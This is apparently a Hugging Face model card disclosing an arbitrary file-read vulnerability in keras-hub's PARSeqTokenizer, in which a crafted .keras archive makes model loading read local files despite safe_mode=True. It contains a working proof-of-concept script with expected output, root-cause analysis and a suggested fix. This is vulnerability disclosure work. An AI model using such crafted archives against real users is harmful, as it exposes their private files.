Instructions to use VincHmann/keras-parseq-tokenizer-file-read-poc with libraries, inference providers, notebooks, and local apps. Follow these links to get started.
- Libraries
- Keras
How to use VincHmann/keras-parseq-tokenizer-file-read-poc with Keras:
# Available backend options are: "jax", "torch", "tensorflow". import os os.environ["KERAS_BACKEND"] = "jax" import keras model = keras.saving.load_model("hf://VincHmann/keras-parseq-tokenizer-file-read-poc") - KerasHub
How to use VincHmann/keras-parseq-tokenizer-file-read-poc with KerasHub:
import keras_hub # Create a Backbone model unspecialized for any task backbone = keras_hub.models.Backbone.from_preset("hf://VincHmann/keras-parseq-tokenizer-file-read-poc") - Keras
How to use VincHmann/keras-parseq-tokenizer-file-read-poc with Keras:
# Available backend options are: "jax", "torch", "tensorflow". import os os.environ["KERAS_BACKEND"] = "jax" import keras model = keras.saving.load_model("hf://VincHmann/keras-parseq-tokenizer-file-read-poc") - Notebooks
- Google Colab
- Kaggle
PARSeqTokenizer Arbitrary File Read via Crafted .keras Archive
Vulnerability: keras_hub.models.PARSeqTokenizer reads an attacker-controlled
file path from config.json during model deserialization with no safe mode guard.
Impact: Loading a crafted .keras file reads any file accessible to the process
and exposes its content in model.vocabulary. safe_mode=True does not protect this path.
CVE status: No CVE assigned. Distinct from CVE-2025-12058 (keras core StringLookup) and not covered by keras-hub PR #2517 (which patched BytePair/WordPiece/SentencePiece but not PARSeqTokenizer).
Root cause
keras_hub/src/models/parseq/parseq_tokenizer.py:
def set_vocabulary(self, vocabulary):
if isinstance(vocabulary, str):
with open(vocabulary, "r", encoding="utf-8") as file: # no in_safe_mode() check
self.vocabulary = [line.rstrip() for line in file]
self.vocabulary = "".join(self.vocabulary)
Compare with the correctly patched BytePairTokenizer (PR #2517):
if isinstance(vocabulary, str):
if serialization_lib.in_safe_mode():
raise ValueError("Requested loading a vocabulary file outside model archive...")
with open(vocabulary, "r", encoding="utf-8") as f:
...
Affected versions
keras-hub 0.25.0 and later (PARSeq was added in PR #2089, August 27, 2025). Live-confirmed on 0.25.1 (PyPI) and 0.29.0.dev0 (source).
Reproduction
Requirements:
pip install keras==3.12.1 keras-hub tensorflow
Step 1: Create the target file (simulates the victim's sensitive file):
echo -e "SENSITIVE_LINE_ONE
SENSITIVE_LINE_TWO" > /tmp/parseq_poc_target.txt
Step 2: Run the PoC script:
# poc_parseq_file_read.py
import sys
from unittest.mock import MagicMock
sys.modules.setdefault("tensorflow_text", MagicMock())
import keras
import keras_hub # required: registers keras_hub>PARSeqTokenizer
# The .keras file in this repo has vocabulary="/tmp/parseq_poc_target.txt"
model = keras.models.load_model("malicious_parseq.keras", safe_mode=True)
print("model.vocabulary:", repr(model.vocabulary))
# Prints the content of /tmp/parseq_poc_target.txt
Expected output:
[!] load_model returned: <PARSeqTokenizer ...>
model.vocabulary: 'SENSITIVE_LINE_ONESENSITIVE_LINE_TWO'
[+] SUCCESS - file content read via safe_mode=True load_model()
Note on tensorflow_text: assert_tf_libs_installed() is a functional
prerequisite in all keras-hub tokenizers. The mock above satisfies it.
In a real attack environment, both tensorflow and tensorflow-text are installed.
Note on import keras_hub: keras_hub must be imported before load_model()
to register the PARSeqTokenizer class in the Keras registry. This is standard
in any environment using keras-hub models.
Full self-contained PoC
See poc_parseq_file_read.py in this repo. It dynamically creates a target
file and a malicious archive, loads the model, and prints the leaked content.
Why safe_mode=True does not protect
keras deserializer (serialization_lib.py:816) resolves keras_hub classes
unconditionally:
if package in {"keras", "keras_hub", "keras_cv", "keras_nlp"}:
# class resolved without any safe_mode gate
SafeModeScope is active during from_config(), but PARSeqTokenizer.set_vocabulary() never calls in_safe_mode(). So the scope is a no-op for this code path.
Additionally, the archive has exactly 3 files (config.json, metadata.json, model.weights.npz). This causes saving_lib.py:484 to set asset_store = None, and saving_lib.py:806 to skip load_assets() entirely -- so no archive-embedded vocabulary overwrites the attacker-supplied path.
Suggested fix
Add an in_safe_mode() guard matching the pattern from PR #2517:
from keras_hub.src.saving import serialization_lib
def set_vocabulary(self, vocabulary):
if isinstance(vocabulary, str):
if serialization_lib.in_safe_mode():
raise ValueError(
"Requested loading a vocabulary file outside the model archive. "
"Pass safe_mode=False if you trust the source."
)
with open(vocabulary, "r", encoding="utf-8") as file:
...
- Downloads last month
- 36